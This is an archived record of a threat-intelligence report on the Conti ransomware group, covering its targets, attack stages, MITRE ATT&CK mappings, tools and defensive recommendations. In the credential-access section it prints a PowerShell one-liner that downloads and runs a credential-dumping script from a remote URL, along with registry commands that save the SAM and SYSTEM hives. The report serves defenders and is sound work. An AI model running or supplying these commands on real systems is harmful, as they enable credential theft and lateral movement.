{
	"id": "c4b55d9d-a1ca-4af5-8911-a9d9bf672d4e",
	"created_at": "2026-04-06T00:10:15.852379Z",
	"updated_at": "2026-04-10T03:19:57.002821Z",
	"deleted_at": null,
	"sha1_hash": "6b451fba6a32b5671a1c41cb61199d1358054446",
	"title": "Ransomware Spotlight: Conti",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 261328,
	"plain_text": "Ransomware Spotlight: Conti\r\nArchived: 2026-04-05 15:06:45 UTC\r\nTop affected industries and countries\r\nConti attacks have been detected all over the globe, with the US amassing over a million attack attempts from January 1 to November 12, 2021. The Netherlands and Taiwan ranked second and third respectively.\r\nFigure 1. Countries with the highest number of attack attempts for Conti ransomware (January 1 to November 12, 2021)\r\nSource: Trend Micro™ Smart Protection Network™ infrastructure\r\nThe retail industry saw the most Conti attack attempts, followed by insurance, manufacturing, and telecommunications. Healthcare, which Conti operators targeted in high-profile attacks this year, is sixth on the list.\r\nFigure 2. Industries with the highest number of attack attempts for Conti ransomware (January 1 to November 12, 2021)\r\nSource: Trend Micro™ Smart Protection Network™ infrastructure\r\nInfection chain and techniques\r\nInitial Access\r\nConti can arrive in the system through BazarLoader, which is delivered via phishing emails containing a Google Drive link that downloads the malware.\r\nAlternatively, the ransomware can arrive via exploitation of the FortiGate firewall vulnerabilities CVE-2018-13379 and CVE-2018-13374. After successfully exploiting the application, the attackers deploy Cobalt Strike to gain a foothold on the system.\r\nConti can also arrive as a result of the exploitation of the ProxyShell Microsoft Exchange vulnerabilities.\r\nDiscovery\r\nFor initial reconnaissance, the Conti group uses tools such as Whoami, Nltest, and Net. These tools give the operators information about where they are in the system and what rights and permissions they have.\r\nSince the operators employ double extortion tactics, they actively look for files to exfiltrate in the discovery stage. The threat actors use tools such as ShareFinder to identify the shares needed for exfiltration and ransomware deployment.\r\nPrivilege Escalation\r\nAlthough the group mostly relies on finding the domain admin credentials to gain full access to the domain, they may also use a couple of exploits like Zerologon (CVE-2020-1472) and PrintNightmare (CVE-2021-1675) to elevate their privileges and further strengthen their foothold in the network.\r\nhttps://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-conti\r\nPage 1 of 6\r\nCredential Access\r\nThe attackers dump cached credentials on systems to allow them to move laterally or elevate their privileges. They use tools such as ProcDump to dump system processes (usually lsass.exe) and use the dump in combination with Mimikatz to extract credentials.\r\nIn other cases, they may use mass-mimikatz, a module from Empire, to dump the credentials on multiple systems.\r\nMimikatz (mass-mimikatz, from Empire)\r\nC:\\WINDOWS\\SYSTEM32\\WBEM\\WMIC.exe /node:localhost process call create powershell /c IEX\r\n(NewObjectNet.WebClient).DownloadString('https://raw.githubusercontent[.]com/PowerShellEmpire/PowerTools/master/PewPewPew/Invo\r\nMassMimikatz.ps1');'24346D,COMPUTERNAME2'|Invoke-MassMimikatz -Verbose \u003e c:/programdata/2.txt\r\nAlternatively, they may also use the kerberoasting module of PowerShell Empire or use tools like Rubeus.\r\nThe attackers may also use native Windows tools, such as Task Manager, to dump the memory of lsass, or use the comsvcs DLL file’s MiniDump function.\r\nThey also gain access to credentials by taking them out of password stores. One of the ways to do this is through “reg save” commands:\r\n- reg save HKLM\\SAM C:\\programdata\\SamBkup.hiv\r\n- reg save HKLM\\SYSTEM C:\\programdata\\FileName.hiv\r\nThey can also use tools such as Get-GPPPassword to get plain text passwords stored in group policy preferences.\r\nThey can also gain credentials from browsers and cloud applications using tools such as SharpChrome and Seatbelt.\r\nAfter gaining enough credentials, they use SMBAutoBrute to automate the task of brute-forcing passwords and see which password works.\r\nAfter gaining information on the domain accounts, the attackers dump the domain controller credentials using Ntdsutil. Alternatively, they can also use Vssadmin to create a snapshot of the system and download Ntds.dit to accomplish this.\r\nLateral Movement\r\nThe attackers can also use batch files to disable security tools. These files are executed through scheduled tasks.\r\nThe group is also known to use third-party tools such as Atera and AnyDesk to control remote systems.\r\nThe operators are also known to use EternalBlue to move laterally in networks of systems that are vulnerable to this exploit.\r\nThey also use PsExec to remotely execute scripts and the ransomware itself.\r\nDefense Evasion\r\nJust before the execution of the ransomware, threat actors create a series of batch files to automate the distribution of their tools in the domain. These tools include scripts to terminate existing security software.\r\nThe operators can also use other tools, like GMER, PC Hunter, and PowerShell, to accomplish this.\r\nExecution\r\nTies to the Trickbot gang gave Conti operators the ability to execute the ransomware via BazarLoader, which leads to Cobalt Strike, which eventually leads to the ransomware itself.\r\nOnce the actors are inside the network, they tend to use scheduled tasks and batch files as a means of execution on remote systems.\r\nAlternatively, to execute the ransomware the operators can use files such as the DontSleep.exe process, which calls the Task Manager, from which the file can be executed.\r\nExfiltration\r\nThe attackers perform data exfiltration from the system with the use of the Rclone tool, an open-source tool used for syncing files to a specified cloud storage service, such as Mega cloud storage.\r\nThe group can also use WinSCP to exfiltrate data.\r\nImpact\r\nAfter exfiltration and distribution of the ransomware to the targeted endpoints, the files are encrypted using ChaCha20, with RSA-4096 used to protect the ChaCha key and nonce.\r\nThe ransomware also inhibits system recovery by deleting shadow copies using WMI.\r\nMITRE tactics and techniques\r\nInitial Access\r\n- T1566 - Phishing: Arrives via phishing emails with BazarLoader\r\n- T1190 - Exploit public-facing application: Arrives via firewall exploits (CVE-2018-13379 and CVE-2018-13374)\r\nExecution\r\n- T1106 - Execution through API: Uses native API to execute commands such as deleting shadow copies\r\n- T1059.003 - Command and scripting interpreter: Windows command shell: Uses batch files to distribute and execute ransomware\r\n- T1047 - Windows Management Instrumentation: Uses WMI to execute batch files and delete shadow copies\r\n- T1204 - User execution: User execution is needed to carry out the payload from the spear phishing link\r\n- T1053.005 - Scheduled task/job: scheduled task: Uses scheduled tasks as a means of execution for the ransomware\r\nPersistence\r\n- T1053.005 - Scheduled task/job: scheduled task: Uses scheduled tasks as a means of execution for the ransomware\r\nPrivilege Escalation\r\n- T1078.002 - Valid accounts: domain accounts: Uses domain administrator accounts to escalate privileges in the system\r\nDiscovery\r\n- T1083 - File and directory discovery: Searches for specific files and directories related to its encryption\r\n- T1018 - Remote system discovery: Enumerates ARP entries to enable distribution to remote systems\r\n- T1057 - Process discovery: Discovers certain processes for process termination\r\n- T1016 - System network configuration discovery: Enumerates ARP entries to enable distribution to remote systems\r\n- T1069.002 - Permission groups discovery: domain groups: Searches for group information for privilege escalation\r\n- T1082 - System information discovery: Logs system information about the host\r\n- T1033 - System owner/user discovery: Performs user discovery for privilege escalation\r\n- T1012 - Query registry: Queries certain registry keys for stored passwords\r\n- T1063 - Security software discovery: Discovers security software for reconnaissance and termination\r\nCredential Access\r\n- T1003 - OS credential dumping: Dumps LSASS memory to be used for retrieving password hashes\r\n- T1555 - Credentials from password stores: Extracts passwords from credential stores using tools such as SharpChrome, Seatbelt, and Get-GPPPassword\r\n- T1552 - Unsecured credentials: Retrieves credentials using Mimikatz\r\nLateral Movement\r\n- T1570 - Lateral tool transfer: Uses BITSAdmin to transfer tools across the network\r\n- T1021.002 - Remote services: SMB/Windows admin shares: Cobalt Strike uses admin shares to distribute itself to remote systems\r\nDefense Evasion\r\n- T1562.001 - Impair defenses: disable or modify tools: Terminates certain security-related software\r\n- T1140 - Deobfuscate/Decode files or information: Ransomware is obfuscated to make detection more difficult\r\n- T1055 - Process injection: Uses process injection to make detection more difficult\r\nCommand and Control\r\n- T1071 - Application layer protocol: Uses HTTP to communicate with its C\u0026C server\r\n- T1219 - Remote access software: Uses RMM software such as AnyDesk and Atera\r\nSummary of malware, tools, and exploits used\r\nSecurity teams can watch out for the presence of the following malware, tools, and exploits that are typically used in Conti attacks:\r\nInitial Entry: Phishing emails; Firewall exploits (CVE-2018-13379 and CVE-2018-13374)\r\nExecution: BazarLoader/BazarBackdoor; Cobalt Strike; DontSleep\r\nDiscovery: Adfind; Net; NetScan; Nltest; ShareFinder; SharpView; PowerUpSQL; Whoami\r\nPrivilege Escalation: EternalBlue (MS17-010); Mimikatz; PowerUpSQL; PrintNightmare (CVE-2021-1675); RouterScan; Zerologon (CVE-2020-1472)\r\nCredential Access: Comsvcs.dll; Mimikatz; Get-GPPPassword; Ntdsutil; PowerShell Empire: Kerberoast; ProcDump; RouterScan; Rubeus; SharpChrome; SMBAutoBrute; Task Manager; Vssadmin\r\nLateral Movement: AnyDesk; Atera; BITSAdmin; Cobalt Strike; EternalBlue; Mimikatz; PsExec\r\nRecommendations\r\nTo help defend systems against similar threats, organizations can establish security frameworks that allocate resources systematically for establishing a solid defense against ransomware.\r\nHere are some best practices that can be included in these frameworks:\r\nAudit and inventory\r\n- Take an inventory of assets and data\r\n- Identify authorized and unauthorized devices and software\r\n- Make an audit of event and incident logs\r\nConfigure and monitor\r\n- Manage hardware and software configurations\r\n- Grant admin privileges and access only when necessary to an employee’s role\r\n- Monitor network ports, protocols, and services\r\n- Activate security configurations on network infrastructure devices such as firewalls and routers\r\n- Establish a software allow list that only executes legitimate applications\r\nPatch and update\r\n- Conduct regular vulnerability assessments\r\n- Perform patching or virtual patching for operating systems and applications\r\n- Update software and applications to their latest versions\r\nProtect and recover\r\n- Implement data protection, backup, and recovery measures\r\n- Enable multifactor authentication\r\nSecure and defend\r\n- Employ sandbox analysis for blocking malicious emails\r\n- Deploy the latest versions of security solutions to all layers of the system, including email, endpoint, web, and network\r\n- Detect early signs of an attack, such as the presence of suspicious tools in the system\r\n- Use advanced detection technologies such as those powered by AI and machine learning\r\nTrain and test\r\n- Regularly train and assess employees on security skills\r\n- Do red-team exercises and penetration tests\r\nA multilayered approach can help organizations guard the possible entry points into the system (endpoint, email, web, and network). Security solutions that can detect malicious components and suspicious behavior could help protect enterprises.\r\nTrend Micro Vision One™ provides multilayered protection and behavior detection, which helps block questionable behavior and tools early on, before the ransomware can do irreversible damage to the system.\r\nTrend Micro Cloud One™ Workload Security protects systems against both known and unknown threats that exploit vulnerabilities. This protection is made possible through techniques such as virtual patching and machine learning.\r\nTrend Micro™ Deep Discovery™ Email Inspector employs custom sandboxing and advanced analysis techniques to effectively block malicious emails, including phishing emails that can serve as entry points for ransomware.\r\nTrend Micro Apex One™ offers next-level automated threat detection and response against advanced concerns such as fileless threats and ransomware, ensuring the protection of endpoints.\r\nIndicators of Compromise\r\nSource: https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-conti",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-conti"
	],
	"report_names": [
		"ransomware-spotlight-conti"
	],
	"threat_actors": [],
	"ts_created_at": 1775434215,
	"ts_updated_at": 1775791197,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/6b451fba6a32b5671a1c41cb61199d1358054446.pdf",
		"text": "https://archive.orkl.eu/6b451fba6a32b5671a1c41cb61199d1358054446.txt",
		"img": "https://archive.orkl.eu/6b451fba6a32b5671a1c41cb61199d1358054446.jpg"
	}
}